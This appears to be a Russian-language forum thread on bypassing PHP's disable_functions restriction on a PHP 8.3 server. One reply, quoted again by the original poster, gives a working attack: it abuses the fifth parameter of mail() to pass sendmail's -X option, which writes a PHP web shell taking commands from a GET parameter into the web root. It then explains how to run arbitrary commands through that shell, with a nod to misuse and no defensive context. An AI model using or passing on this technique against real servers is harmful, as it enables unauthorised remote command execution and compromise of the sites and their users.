|
Moderation History | New Thread | Reply | Subscribe
|
|
eQuals11
Member since Feb 07, 2026
|
возможен ли обход запрета на выполнение команд через disable_functions() при помощи штатных средств Php? сервер держится на php 8.3 |
| Posted Mar 10, 2026, 11:50 PM |
Quote
|
mozart5207
Member since Feb 04, 2026
|
eQuals11 said on 10.03.2026, 11:50 PM:
> возможен ли обход запрета на выполнение команд через disable_functions() при помощи штатных средств Php? сервер держится на php 8.3
Вроде сервер не обойти, но можно обойти CLI версию (не помню, как) |
| Posted Mar 11, 2026, 08:08 AM |
Quote
|
mk88
Member since Feb 15, 2026
|
Через пятый аргумент в mail() обходится, т. к. формат у сей функции: mail($to, $subject, $message, $headers, $params);, то через $params можно запустить команду или создать файл.
Выполняется при вызове mail() такая команда на сервере:
/usr/sbin/sendmail -t -i <params>
Соответственно через -X пишем простейший веб-шелл:
mail("a@b.com","test","<?php system($_GET['cmd']); ?>","","-X/var/www/html/shell.php");
И если зайти на http://домен/shell.php?cmd=команда
То вы сами понимаете что. :) |
| Posted Mar 11, 2026, 01:36 PM |
Quote
|
eQuals11
Member since Feb 07, 2026
|
mk88 said on 11.03.2026, 01:36 PM:
> Через пятый аргумент в mail() обходится, т. к. формат у сей функции: mail($to, $subject, $message, $headers, $params);, то через $params можно запустить команду или создать файл.
>
> Выполняется при вызове mail() такая команда на сервере:
>
> /usr/sbin/sendmail -t -i <params>
>
> Соответственно через -X пишем простейший веб-шелл:
>
> mail("a@b.com","test","<?php system($_GET['cmd']); ?>","","-X/var/www/html/shell.php");
>
>
> И если зайти на http://домен/shell.php?cmd=команда
>
> То вы сами понимаете что. :)
это понятно, но disable_functions тут ни при чем только |
| Posted Mar 11, 2026, 07:19 PM |
Quote
|
Social
